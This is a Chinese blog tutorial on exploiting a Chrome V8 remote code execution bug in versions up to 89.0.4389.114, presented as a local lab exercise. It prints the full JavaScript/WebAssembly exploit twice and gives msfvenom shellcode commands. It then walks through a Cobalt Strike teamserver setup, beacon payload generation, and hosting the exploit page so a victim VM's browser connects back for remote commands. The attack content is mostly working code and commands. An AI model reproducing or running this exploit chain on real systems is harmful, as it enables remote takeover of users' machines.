Chrome浏览器代码执行0day漏洞

最新推荐文章于 2024-04-21 13:18:47 发布
最新推荐文章于 2024-04-21 13:18:47 发布
阅读量3.4k 收藏 2
点赞数
文章标签: chrome 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NicolasZQ/article/details/121940527
版权

适用版本:

漏洞危害:远程代码执行
影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114)
测试版本: 86.0.4240.198

教程内容:

一、利用kali生成shellcode代码

  1. 比如说我要弹出计算器,那么:

64位操作系统:

msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num

32位操作系统:

msfvenom -a x86 -p windows/exec CMD="calc" EXITFUNC=thread -f num

把这段16进制的数复制下来,放到下面代码第七行的括号里面:

<script>

function gc() {

for (var i = 0; i < 0x80000; ++i) {

var a = new ArrayBuffer();

}

}

let shellcode = []; //生成的shellcode放入中括号内

var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);

var wasmModule = new WebAssembly.Module(wasmCode);

var wasmInstance = new WebAssembly.Instance(wasmModule);

var main = wasmInstance.exports.main;

var bf = new ArrayBuffer(8);

var bfView = new DataView(bf);

function fLow(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(0, true));

}

function fHi(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(4, true))

}

function i2f(low, hi) {

bfView.setUint32(0, low, true);

bfView.setUint32(4, hi, true);

return bfView.getFloat64(0, true);

}

function f2big(f) {

bfView.setFloat64(0, f, true);

return bfView.getBigUint64(0, true);

}

function big2f(b) {

bfView.setBigUint64(0, b, true);

return bfView.getFloat64(0, true);

}

class LeakArrayBuffer extends ArrayBuffer {

constructor(size) {

super(size);

this.slot = 0xb33f;

}

}

function foo(a) {

let x = -1;

if (a) x = 0xFFFFFFFF;

var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));

arr.shift();

let local_arr = Array(2);

local_arr[0] = 5.1;//4014666666666666

let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8

arr[0] = 0x1122;

return [arr, local_arr, buff];

}

for (var i = 0; i < 0x10000; ++i)

foo(false);

gc(); gc();

[corrput_arr, rwarr, corrupt_buff] = foo(true);

corrput_arr[12] = 0x22444;

delete corrput_arr;

function setbackingStore(hi, low) {

rwarr[4] = i2f(fLow(rwarr[4]), hi);

rwarr[5] = i2f(low, fHi(rwarr[5]));

}

function leakObjLow(o) {

corrupt_buff.slot = o;

return (fLow(rwarr[9]) - 1);

}

let corrupt_view = new DataView(corrupt_buff);

let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);

let idx0Addr = corrupt_buffer_ptr_low - 0x10;

let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;

let delta = baseAddr + 0x1c - idx0Addr;

if ((delta % 8) == 0) {

let baseIdx = delta / 8;

this.base = fLow(rwarr[baseIdx]);

} else {

let baseIdx = ((delta - (delta % 8)) / 8);

this.base = fHi(rwarr[baseIdx]);

}

let wasmInsAddr = leakObjLow(wasmInstance);

setbackingStore(wasmInsAddr, this.base);

let code_entry = corrupt_view.getFloat64(13 * 8, true);

setbackingStore(fLow(code_entry), fHi(code_entry));

for (let i = 0; i < shellcode.length; i++) {

corrupt_view.setUint8(i, shellcode[i]);

}

main();

</script>

就像下面这样:

保存这个txt文件为exploit.html(名字无所谓,别带中文)。

  1. 此次测试需要关闭沙箱环境:

右键单击chrome浏览器的图标(我这个是修改过的),然后在目标的最后面加上

--no-sandbox file:///C:/Users/xuanjian/Desktop/exploit.html(文件路径自己改)

  1. 点击“应用”,然后打开浏览器。

看到已经执行了命令cmd='calc',弹出了一个计算器。

二、利用cobaltstrike上线

前期准备:

  1. 如果你有两台电脑可以一台当服务端一台当客户端,但是如果像我一样,只有一台电脑,那么就按照以下这些步骤来。

我是拿我的宿主机当服务端,win10虚拟机当客户端,win7虚拟机当受害人。

  1. 在win10虚拟机和宿主机上面安装好apache2,如何安装请参考Apache安装教程_Junior2018的博客-CSDN博客_apache安装
  2. 在win10虚拟机和宿主机上都放一份cobaltstrike,下载链接:文件密码:av41
  1. 关闭win10虚拟机和win7虚拟机的防火墙,包括域防火墙。(做完1这个操作之后按照234一步步点击)

教程内容:

  1. 在宿主机上以管理员身份打开cmd窗口,一定要管理员身份,然后输入cd 你的cobaltstrike目录,比如我是

cd C:\Users\nicolas\桌面\CobaltStrike\CobaltStrike,然后输入teamserver.bat 192.168.209.1 1234,192.168.209.1指的是宿主机的IP,1234是密码,可以随便输,但是不要中文。

出现这种内容就表示成功了。

  1. 然后打开win10虚拟机,单击cobaltsrike.bat:

输入IP是192.168.209.1、端口号50050(如果没开就新建个入站规则)、密码1234

  1. 进入之后,单击左上角的耳机符号的按钮:

3.点击最底下的“add”,按照下图内容填写,然后save保存:

其中,192.168.209.1和之前的要一致,端口号任意,只要不被占用即可。

  1. 点击最上面的攻击—>生成后门—>Payload Generator

然后填入以下内容,如果监听器一格没内容,就add添加进去,记得勾选“使用x64 payload”:

然后点击generate保存到电脑里面,如下图:

  1. 记事本打开这段payload,按快捷键ctrl+H把\全部替换为,0(注意是英文的,)

然后复制双引号里面的内容,记得去掉第一个逗号,发复制的内容粘贴在下面这段代码的第七行的括号里面。

<script>

function gc() {

for (var i = 0; i < 0x80000; ++i) {

var a = new ArrayBuffer();

}

}

let shellcode = []; //生成的shellcode放入中括号内

var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);

var wasmModule = new WebAssembly.Module(wasmCode);

var wasmInstance = new WebAssembly.Instance(wasmModule);

var main = wasmInstance.exports.main;

var bf = new ArrayBuffer(8);

var bfView = new DataView(bf);

function fLow(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(0, true));

}

function fHi(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(4, true))

}

function i2f(low, hi) {

bfView.setUint32(0, low, true);

bfView.setUint32(4, hi, true);

return bfView.getFloat64(0, true);

}

function f2big(f) {

bfView.setFloat64(0, f, true);

return bfView.getBigUint64(0, true);

}

function big2f(b) {

bfView.setBigUint64(0, b, true);

return bfView.getFloat64(0, true);

}

class LeakArrayBuffer extends ArrayBuffer {

constructor(size) {

super(size);

this.slot = 0xb33f;

}

}

function foo(a) {

let x = -1;

if (a) x = 0xFFFFFFFF;

var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));

arr.shift();

let local_arr = Array(2);

local_arr[0] = 5.1;//4014666666666666

let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8

arr[0] = 0x1122;

return [arr, local_arr, buff];

}

for (var i = 0; i < 0x10000; ++i)

foo(false);

gc(); gc();

[corrput_arr, rwarr, corrupt_buff] = foo(true);

corrput_arr[12] = 0x22444;

delete corrput_arr;

function setbackingStore(hi, low) {

rwarr[4] = i2f(fLow(rwarr[4]), hi);

rwarr[5] = i2f(low, fHi(rwarr[5]));

}

function leakObjLow(o) {

corrupt_buff.slot = o;

return (fLow(rwarr[9]) - 1);

}

let corrupt_view = new DataView(corrupt_buff);

let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);

let idx0Addr = corrupt_buffer_ptr_low - 0x10;

let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;

let delta = baseAddr + 0x1c - idx0Addr;

if ((delta % 8) == 0) {

let baseIdx = delta / 8;

this.base = fLow(rwarr[baseIdx]);

} else {

let baseIdx = ((delta - (delta % 8)) / 8);

this.base = fHi(rwarr[baseIdx]);

}

let wasmInsAddr = leakObjLow(wasmInstance);

setbackingStore(wasmInsAddr, this.base);

let code_entry = corrupt_view.getFloat64(13 * 8, true);

setbackingStore(fLow(code_entry), fHi(code_entry));

for (let i = 0; i < shellcode.length; i++) {

corrupt_view.setUint8(i, shellcode[i]);

}

main();

</script>

保存这段代码为exploit.html,传到apache的htdocs目录下,然后打开win7虚拟机。

  1. 右键单击chrome浏览器图标,在目标后面加上--no-sandbox,表示关闭沙箱环境,否则沙箱可以识别出,点击“应用”。

然后打开chrome,在地址栏输入192.168.209.1/exploit.html,等一会儿出现下面这个界面就对了:

  1. 回到win10虚拟机,可以看到cs里面已经上线了我们的win7虚拟机:

我们可以单击右键进入beacon:

输入shell ipconfig即可查看我们win7虚拟机的IP地址:

还可以输入其他的命令,这里不一一展开了。

教程总结:

  1. 防火墙要关完全。
  2. 其实这个漏洞挺鸡肋的,因为要关闭沙箱,正常人不会这么做,就好比问别人要账号密码一样不太现实。
  3. 是一次初学者本地练习cs上线的不错的机会。

转载请注明:https://blog.csdn.net/NicolasZQ/article/details/121940527

W01fh4cker
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
chrome浏览器
12-21
十分好用~!简单耐用 绝对是最好用的浏览器!
google chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位)
09-15
chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位) chrome浏览器最新版本,版本 105.0.5195.127(正式版本) (64 位)
什么是0-day漏洞,怎么防护0-day漏洞攻击
最新发布
dexunyun的博客
04-21 1639
然而,通过加强系统安全漏洞管理、提升安全防护能力、加强安全监控和应急响应以及加强安全意识教育等多方面的措施,我们可以有效应对0day漏洞攻击,保障网络和信息安全。攻击由之前被动式的、传播缓慢的文件和宏病毒演化为利用几天或几小时传播的更加主动的、自我传播的电子邮件蠕虫和混合威胁。3、使用WAAP全站防护,全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。
Chrome 浏览器中执行 JavaScript
01-18
Chrome 浏览器中执行 JavaScript 本章节为大家介绍如何在 Chrome 浏览器上进行 JavaScript 代码的运行与调试。 Chrome 是由 Google 开发的免费网页浏览器,对于前端开发来说(尤其是调试代码)非常方便。 Chrome 官网地址:https://www.google.com/intl/zh-CN/chrome/。 我们在 Chrome 浏览器中可以通过按下 F12 按钮或者右击页面,选择“检查”来开启开发者工具。 也可以在右上角菜单栏选择 “更多工具”=》”开发者工具” 来开启: 1、Console 窗口调试 JavaScript 代码 打开开发
JS使用Chrome浏览器实现调试线上代码
10-15
主要介绍了JS使用Chrome浏览器实现调试线上代码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Chrome浏览器 v109.0.5414.75稳定版 64位 离线安装包
01-14
Chrome浏览器 v109.0.5414.75稳定版 64位 离线安装包 最新版本:v109.0.5414.75 稳定版 64位 稳定版32位
0day漏洞大集合
06-09
0day漏洞 最新0day 突破安全狗 web渗透利用工具 仅供学习研究
Chrome 被曝 0day 漏洞,可让黑客获取用户数据
weixin_33748818的博客
03-01 260
谷歌浏览器 Chrome 中的 0day漏洞允许黑客使用浏览器加载恶意 PDF 文档来获取个人数据。由 EdgeSpot 发现的这项安全漏洞,已经在被黑客利用,谷歌官方修复方案只会在4...
谷歌Chrome紧急更新补丁0day漏洞
itcarry的博客
05-24 254
Chrome 100.0.4896.127 已针对所有受支持的桌面操作系统(Windows、Mac 和 Linux)发布,以解决该问题。更新将像往常一样随着时间的推移推出,但 Chrome 用户可以通过以下方式加快安装速度:
0day漏洞
weixin_33895657的博客
03-07 199
0Day的概念最早用于软件和游戏破解,属于非盈利性和非商业化的组织行为,其基本内涵是“即时性”。 Warez被许多人误认为是一个最大的软件破解组 织,而实际上,Warez如黑客一样,只是一种行为。 0Day也是。当时的0Day是指在正版软件或游戏发布的当天甚至之前,发布附带着序列号或者解密器 的破解版,让使用者可以不用付费就能长期使用。 因此,虽然Warez和0Day都是反盗版的重要打击对象,却同...
Google Chrome 0day 远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 667
1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
Google Chrome 浏览器
02-20
CSDN下载频道是Google Chrome浏览器官方指定下载站点,可以确保您下载到免费的最新版本无插件绿色软件。 免费体验高效办公还有积分相送你还不快来试试! 注意:已经安装过Chrome浏览器的用户必须要先卸载浏览器和原有配置文件,再下载安装此版本Chrome浏览器,并用此版本浏览器下载资源赠分才会生效。
C#提取Chrome浏览器Cookie值源码
10-16
Chrome 80.X版本Cookies解密源码
Chrome浏览器最新版本109.0.5414.75-chrome-installer 离线安装包
01-14
109.0.5414.75_chrome_installer_x86 谷歌浏览器最新版本,稳定版32位浏览器,离线安装包
Google Chrome浏览器下载
04-18
Google Chrome浏览器下载,谷歌浏览器(Google Chrome)是谷歌公司开发的一款免费的网络浏览器。它拥有简洁的界面,机智的地址栏,强大的浏览选项和web应用扩展。Chrome 浏览器的目标是让上网变简单、快速和安全。 主要特性: • 速度极快:Chrome浏览器采用了极简主义的设计理念,页面加载速度很快,很好地兼顾了页面显示速度和系统资源占用。 • 安全稳定:Chrome浏览器内置了安全沙箱机制,避免恶意软件对用户系统的攻击,保证上网安全。并且定期自动更新,修复安全漏洞。 • 界面简洁:Chrome浏览器界面简单实用,主页干净利落,地址栏和搜索栏完美结合,提供更加直观的上网体验。 • 强大扩展:Chrome浏览器支持各种web应用扩展,用户可以根据个人需要自由安装与卸载,比如广告拦截,网页翻译等功能。 • 跨平台支持: Chrome浏览器支持Windows、Mac、Android、iOS多个平台,PC端和移动端同步数据与设置,使上网体验无缝切换。 • 数据同步:Chrome浏览器通过与Google账号绑定,实现上网浏览数据跨设备自动同步,不论在手机还是电脑上浏
chrome浏览器打开axure生成的HTML静态文件页面
11-21
chrome浏览器打开axure生成的HTML静态文件页面 已升级manifest version 3版本 第一步:解压得到一个axure-chrome-extension的文件夹。 第二步:打开Google浏览器,在地址栏中输入chrome://extensions/ 或者右上角设置——更多工具——扩展程序,打开扩展程序界面。在页面右上角打开【开发者模式】。 第三步:点击【加载已解压的扩展程序】,选择刚刚解压得到的“axure_chrome_extension”文件夹,即可安装成功。 axure_chrome_extension文件夹不可删除
【POC公开】Chrome 远程代码执行0Day漏洞通告
爱国小白帽
04-13 667
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-041301 报告来源:360CERT 报告作者:360CERT 更新日期:2021-04-13 1 漏洞简述 2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情,漏洞等级:严重,漏洞评分:9.8。 Google Chrome是由Google开发的免费网页浏览器。Chrome是化学元素“铬”的英文名称,过去也用Chrome称呼浏览器的外框。Chrome相应的开放源代码计划名为Ch
Google 0day远程命令执行漏洞复现
星落的博客
04-15 656
目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面会造成远程代码执行漏洞影响 Chrome 最新正式版(89.0.4389.114)以及所有低版本。 影响版本 < = 89.0.4389.114 ​​​​​​​漏洞复现 1.使用对应版本的google浏览器,一定要用64位的特定版本。否则无法弹出计算器。 版本号:88.0.43.
【复现】windows Chrome 0day漏洞
qq_43710889的博客
07-05 403
文章目录【复现】windows Chrome 0day漏洞0x01漏洞描述0x02漏洞详情0x03漏洞复现1.首先关闭Chrome浏览器的沙盒模式2.再次打开浏览器,发现出现`-no-sandbox`,3.代码程序4.漏洞复现(打开html) 参考链接: https://www.pwnwiki.org/index.php?title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9E http://pub-shbt.s3.360.cn/cert-public-file/%E3%80
selenium2.48隐藏chrome浏览器代码
03-30
以下是使用Selenium 2.48版本隐藏Chrome浏览器的Python代码示例: ```python from selenium import webdriver from selenium.webdriver.chrome.options import Options # 创建Chrome浏览器选项 chrome_options = Options() chrome_options.add_argument("--headless") # 隐藏浏览器窗口 # 创建Chrome浏览器实例 driver = webdriver.Chrome(options=chrome_options) # 访问网页 driver.get("https://www.google.com") # 执行其他操作... # 关闭浏览器 driver.quit() ``` 在以上代码中,`Options()`是Chrome浏览器选项,`add_argument()`方法用于添加选项。`"--headless"`选项表示隐藏浏览器窗口。创建Chrome浏览器实例时,将选项传递给`webdriver.Chrome()`方法的`options`参数。 在访问网页后,可以执行其他操作,如查找元素、模拟用户操作等。最后,调用`driver.quit()`方法关闭浏览器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值